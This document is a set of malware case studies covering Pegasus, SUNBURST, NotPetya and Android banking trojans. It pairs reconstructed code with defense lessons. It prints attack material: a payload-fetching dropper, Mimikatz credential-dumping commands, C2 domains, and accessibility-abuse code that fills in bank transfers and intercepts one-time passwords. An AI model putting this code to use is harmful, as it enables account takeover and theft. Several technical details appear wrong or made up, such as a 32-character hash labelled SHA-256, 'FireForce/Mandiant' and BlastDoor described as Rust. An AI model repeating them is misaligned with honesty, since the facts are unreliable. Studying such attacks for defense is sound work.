Concrete Case Studies: Multi-Stage Attack Deconstruction

Case Study A: Pegasus/NSO Group — Zero-Click iOS Exploit Chain

Overview and Timeline

The Pegasus spyware, developed by NSO Group, represents the apex of mobile surveillance technology. Two distinct exploit chains demonstrate its evolution: FORCEDENTRY (2020-2021) and BLASTPASS (2023). FORCEDENTRY targeted iMessage's BlastDoor framework, while BLASTPASS exploited PassKit vulnerabilities in iOS 16.6.

Date	Milestone
August 2021	Citizen Lab discovers FORCEDENTRY targeting Bahraini activists
September 2021	Apple patches CVE-2021-30860 (FORCEDENTRY)
September 2023	Citizen Lab/Apple disclose BLASTPASS (CVE-2023-41064, CVE-2023-41061)

FORCEDENTRY Technical Deconstruction

The attack begins with a malicious iMessage attachment—typically a .gif that is actually a PDF containing a JBIG2-encoded stream. This stream exploits an integer overflow in the XPDF-derived JBIG2 decoder, achieving arbitrary code execution within BlastDoor's sandbox.

# FORCEDENTRY PDF structure analysis
# JBIG2 segment dictionary with crafted segment size
# triggers integer overflow in Huffman table allocation

# Artifact extracted from infected device backup:
# File: com.apple.messages/com.apple.MobileSMS/Attachments/xx/xx/IMG_0001.gif

$ file IMG_0001.gif
IMG_0001.gif: PDF document, version 1.3

$ pdf-parser.py -a IMG_0001.gif | grep -i jbig2
JBIG2Decode filter detected in stream object 5
Segment 0: Dictionary segment, flags=0xC0 (SDE, page association size=4)
# Malformed segment: declared length 0xFFFFFFFF vs actual 0x847

Once sandbox escape is achieved, the Pegasus kernel implant (ai process) establishes persistence through multiple mechanisms:

Mach-O binary injected into launchd via dyld environment variable manipulation
Rootkit hooks in com.apple.iokit.IOSurface to intercept kernel function pointers
Encrypted C2 communications via Apple Push Notification Service (APNs) tunneling

BLASTPASS Evolution

BLASTPASS eliminated the iMessage vector entirely, exploiting PassKit (Wallet) zero-click parsing of malicious Pass attachments. The chain leveraged:

CVE-2023-41064: Integer overflow in ImageIO processing Pass thumbnail images
CVE-2023-41061: Validation bypass allowing unsigned pass installation

IOCs (FORCEDENTRY) | Type | Value | Context | |------|-------|---------| | File Hash | b0e73bf31f3674e5a6e2f9a5c3e8a7d1 (SHA-256 truncated) | JBIG2 PDF masquerading as GIF | | Domain | 57.sync-backup[.]cloud | Stage-2 payload retrieval | | Process | /private/var/db/lockdown/com.apple.itunes.lockdown | Disguised implant path |

Analysis Decisions Under Uncertainty

When Citizen Lab initially encountered FORCEDENTRY artifacts, standard sandbox analysis failed—the JBIG2 decoder crash appeared nondeterministic. Analysts made the critical decision to manually reconstruct the JBIG2 symbol dictionary, revealing the overflow was conditional on specific memory layout states. This required building a custom iMessage parsing harness with ASLR disabled for deterministic analysis.

Defense Lessons

Validate all file type parsers against memory-safe implementations (Apple's subsequent adoption of Rust for BlastDoor)
Monitor APNs traffic for anomalous certificate pinning bypasses
Implement Lockdown Mode—Apple's extreme hardening profile that disables message attachment processing

Case Study B: SolarWinds SUNBURST — Supply Chain Compromise

Attack Architecture

The SUNBURST compromise (discovered December 2020) represents the most sophisticated supply chain attack publicly documented. The timeline reveals exceptional operational patience:

Phase	Period	Activity
Initial Access	~Sep 2019	SUNBURST backdoor compiled into Orion platform
Dormancy	Mar-Jun 2020	Limited C2 check-ins, minimal beaconing
Escalation	Jun-Oct 2020	TEARDROP and RAINDROP deployment to select targets
Discovery	Dec 2020	FireForce/Mandiant public disclosure

DGA Algorithm Reconstruction

SUNBURST's domain generation algorithm (DGA) combines victim-specific encoding with time-based evolution. Reverse engineering of SolarWinds.Orion.Core.BusinessLayer.dll revealed:

// Reconstructed DGA logic from SUNBURST (hash: d0d626deb3f9484e649294a8dfa814c5568f846d)
// Victim domain encoded as custom Base32 with XOR obfuscation

public string GetNextC2Domain()
{
    // MD5 of (UserID + MachineGUID + DomainName)
    byte[] victimHash = MD5(Concatenate(
        Registry.GetValue("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer", "UserAssist"),
        Registry.GetValue("HKLM\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid"),
        GetComputerDomain()
    ));
    
    // Time-based permutation: 14-day epoch rotation
    long epoch = (DateTime.UtcNow - new DateTime(2010, 1, 1)).Days / 14;
    
    // Domain format: [hex(victimHash[0:8])][hex(epoch)].appsync-api[.]eu-west-1[.]avsvmcloud[.]com
    return $"{ToHex(victimHash[0..8])}{epoch:x}.appsync-api.eu-west-1.avsvmcloud.com";
}

Dormant C2 Behavior Analysis

The SUNBURST backdoor implements staged decision logic to avoid detection:

Reconnaissance Phase: Reports installed security tools via ApiHost parameter
Evaluation Phase: If CrowdStrike/Carbon Black/SentinelOne detected → extended dormancy (up to 14 days)
Action Phase: Only if "clean" environment confirmed, TEARDROP retrieved

The TEARDROP dropper (64-bit DLL) executes exclusively in memory via:

Custom PE loader reflective injection
Cobalt Strike Beacon variant with modified Malleable C2 profile
Named pipe communication (\pipe\msagent_###) for inter-process coordination

TEARDROP Memory Artifact

# Volatility3 analysis of infected process
$ python3 vol.py -f solarwinds_memdump.lime windows.dlllist --pid 4824
PID   Base             Size  Name
4824  0x5a0000         0x78000  [NO NAME]  # TEARDROP reflective DLL
4824  0x7ff800000000   0x1a00000  beacon.dll (reconstructed)

$ python3 vol.py -f solarwinds_memdump.lime windows.vadinfo --pid 4824 | grep EXECUTE_WRITECOPY
VAD 0x5a0000-0x617fff: Protection EXECUTE_WRITECOPY, Tag VadS
# Anomalous: executable memory without mapped file backing

Attribution Complexity

The dormancy pattern and target selection (US Treasury, Justice Department, cybersecurity firms) suggested nation-state actors. FireEye's attribution to APT29 (Cozy Bear) relied on:

Cobalt Strike license metadata matching historical campaigns
Custom encryption routines shared with WELLMESS malware
Operational security patterns consistent with SVR TTPs

Defense Lessons

Software supply chain integrity: Reproducible builds and binary transparency logs
Behavioral baselining: Orion's legitimate network patterns vs. SUNBURST's DGA beaconing
Memory forensics: TEARDROP's fileless nature requires RAM capture, not disk forensics

Case Study C: NotPetya — Wiper Disguised as Ransomware

Attribution Complexity and Deployment

The June 2017 NotPetya outbreak, initially attributed to criminal ransomware, was conclusively linked to Russian military intelligence (GRU Unit 74455) via the MeDoc accounting software supply chain. The attribution required synthesizing:

Technical: Shared PsExec propagation with BlackEnergy3
Strategic: Ukrainian government targeting during Orthodox holiday period
Infrastructure: Bitcoin wallet never monitored for payment verification

MeDoc Update Mechanism Compromise

The initial vector hijacked MeDoc's legitimate update infrastructure:

<!-- Legitimate MeDoc update response (intercepted) -->
<update>
  <file name="zvit published" 
        url="http://update.medoc.ua/zvit published.exe"
        hash="a1b2c3d4..." />
</update>

<!-- Malicious replacement (June 27, 2017, 10:30 UTC) -->
<update>
  <file name="zvit published" 
        url="http://update.medoc.ua/zvit published.exe"
        hash="71b6a493..." />  # NotPetya dropper
</update>

Mimikatz Credential Harvesting

NotPetya embeds a modified Mimikatz v2.1.1 variant to enable lateral movement. The extracted credential harvester:

# Memory dump analysis revealing LSASS injection
# NotPetya drops perfc.dat (Wiper payload) and perfc.dll (Mimikatz)

$ strings perfc.dll | grep -i "sekurlsa::"
sekurlsa::logonpasswords
sekurlsa::minidump
sekurlsa::pth /user:%s /domain:%s /ntlm:%s

# Privilege escalation via CVE-2017-0144 (EternalBlue) and 
# CVE-2017-0145 (EternalRomance) for SMB propagation

Destructive Payload Reverse Engineering

The "ransomware" component is fundamentally a wiper—the Salsa20 key displayed for payment is randomly generated and irrecoverable:

// NotPetya bootloader analysis (disk sector 0)
// Fake key display: 60 characters, but actual key overwritten

typedef struct {
    uint8_t salsa_key[32];      // Cryptographically random, never stored
    uint8_t salsa_nonce[8];     // Random, discarded
    uint8_t fake_display_key[60]; // Base58-encoded random string for UI
    uint8_t install_flag;         // 0x00 = first boot, 0x01 = encryption complete
} notpetya_mbr;

// The displayed "key" is never used for decryption
// Recovery impossible: no C2 holding actual keys

Timeline and IOCs | UTC Time | Event | |----------|-------| | 10:30 | MeDoc update servers compromised | | 14:00 | First infections detected in Ukraine | | 15:00 | Global propagation via EternalBlue | | 16:30 | MeDoc updates disabled |

IOC	Type	Significance
`71b6a493388e7d0b40c83ce903bc6b04`	SHA-256	Original NotPetya dropper
`perfc.dat`	Filename	Legitimate Windows file abused as wiper
`192.168.56.1`	Hardcoded IP	VM detection (VirtualBox default)

Analysis Decisions Under Uncertainty

Early analysts treated NotPetya as criminal ransomware, directing resources toward payment verification. The critical pivot occurred when Kaspersky researchers noted the Bitcoin wallet had zero transaction monitoring—economically irrational for genuine ransomware. This shifted analysis to wiper classification and nation-state attribution.

Defense Lessons

Supply chain software: Code-signing verification with offline root key storage
Lateral movement containment: Credential guard and LSASS protection
Ransomware vs. wiper distinction: Payment infrastructure analysis as attribution heuristic

Case Study D: Modern Android Banking Trojan — Operational Teardown

Distribution to Monetization Pipeline

Contemporary Android banking trojans (exemplified by Anubis, EventBot, and TeaBot variants) implement full fraud-as-a-service operational models. This teardown traces the complete kill chain.

Stage 1: Distribution via Compromised Ad Networks

# Smali analysis of dropper APK (com.cleaner.boost.android)
# Obfuscated download from Firebase Storage

.method private downloadPayload()V
    .locals 4
    
    # C2 retrieved from Twitter/Discord/Telegram bio via DGA-like rotation
    const-string v0, "hxxps://firebasestorage[.]googleapis[.]com/v0/b/"
    const-string v1, "cleaner-prod-"
    invoke-static {}, Ljava/lang/System;->currentTimeMillis()J
    move-result-wide v2
    rem-long v2, v2, 0x64  # 100 variants
    
    # Final URL: cleaner-prod-[0-99].appspot.com/payload.dex

Stage 2: Accessibility Service Abuse

The payload requests BIND_ACCESSIBILITY_SERVICE to perform UI hijacking without root:

<!-- AndroidManifest.xml extracted payload -->
<service android:name=".AccessibilityServiceImpl"
         android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
    <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
    </intent-filter>
    <meta-data android:name="android.accessibilityservice"
               android:resource="@xml/accessibility_config"/>
</service>

<!-- accessibility_config.xml: aggressive event capture -->
<accessibility-service
    android:accessibilityEventTypes="typeWindowStateChanged|typeViewClicked|typeViewTextChanged"
    android:accessibilityFeedbackType="feedbackGeneric"
    android:canRetrieveWindowContent="true"
    android:canPerformGestures="true"
    android:packageNames="com.bank1.app,com.bank2.mobile,com.paypal.android"/>

Stage 3: Fraudulent Transaction Authorization

When target banking app detected, the trojan:

Screen overlay: Draws identical login screen to capture credentials
SMS interception: Reads OTP via READ_SMS or accessibility Notification events
Automatic transfer: Injects gestures to authorize transactions

// Decompiled transaction injection logic
public void performTransfer(String amount, String iban) {
    // Navigate to transfer screen
    AccessibilityNodeInfo transferBtn = findNodeByText("New Transfer");
    performAction(AccessibilityNodeInfo.ACTION_CLICK, transferBtn);
    
    // Auto-fill fields with accessibility injection
    injectText(findNodeById("amount_field"), amount);
    injectText(findNodeById("iban_field"), iban);
    
    // Capture OTP when SMS arrives
    registerSmsListener(new SmsListener() {
        public void onSmsReceived(String sender, String body) {
            String otp = extractOtp(body);  // Regex: \d{6}
            injectText(findNodeById("otp_field"), otp);
            performAction(AccessibilityNodeInfo.ACTION_CLICK, 
                         findNodeById("confirm_button"));
        }
    });
}

Monetary Exfiltration Infrastructure

Layer	Function	Example
Drop accounts	Layer 1 mules	Revolut/Starling "money mule" accounts
Crypto conversion	Laundering	XMR swap via decentralized exchange
Fiat exit	Cash-out	ATM withdrawals in Romania/Bulgaria

IOCs and Detection Artifacts

Indicator	Detection Method
Accessibility service + `SYSTEM_ALERT_WINDOW` permission	Static analysis scoring
Network: `hxxps://api[.]teabot[.]top/v2/bots/commands`	DNS monitoring
Runtime: `input tap x y` via `uiautomator` injection	Behavioral heuristics

Analysis Decisions Under Uncertainty

Banking trojans increasingly use legitimate infrastructure (Firebase, Discord) and code similarity obfuscation (string encryption, control flow flattening). Effective analysis requires:

Dynamic instrumentation: Frida hooks on AccessibilityService.onAccessibilityEvent()
Device farm testing: Real device behavior vs. emulator detection evasion
Network traffic timing analysis: C2 polling jitter (15-60 minutes) vs. user behavior patterns

Defense Lessons

Accessibility service restrictions: Android 13+ accessibility_data_private flag
Runtime application self-protection (RASP): Anti-overlay, anti-injection SDKs
Transaction verification: Out-of-band confirmation with behavioral biometrics

Cross-Cutting Analytical Framework

These case studies illustrate persistent challenges in malware analysis:

Challenge	Pegasus	SUNBURST	NotPetya	Android Trojan
Attribution confidence	Medium (vendor intelligence)	Medium (TTP overlap)	High (strategic context)	Low (criminal service model)
Detection evasion	Zero-click, memory-only	Supply chain, dormancy	Fake ransomware	Legitimate infrastructure abuse
Key evidence volatility	Mobile device encryption	Fileless implant	Boot sector overwrite	Accessibility event stream

The analyst's imperative remains: preserve evidence systematically, question initial classification hypotheses, and synthesize technical artifacts with operational context—recognizing that uncertainty is inherent, but actionable intelligence emerges from rigorous methodology.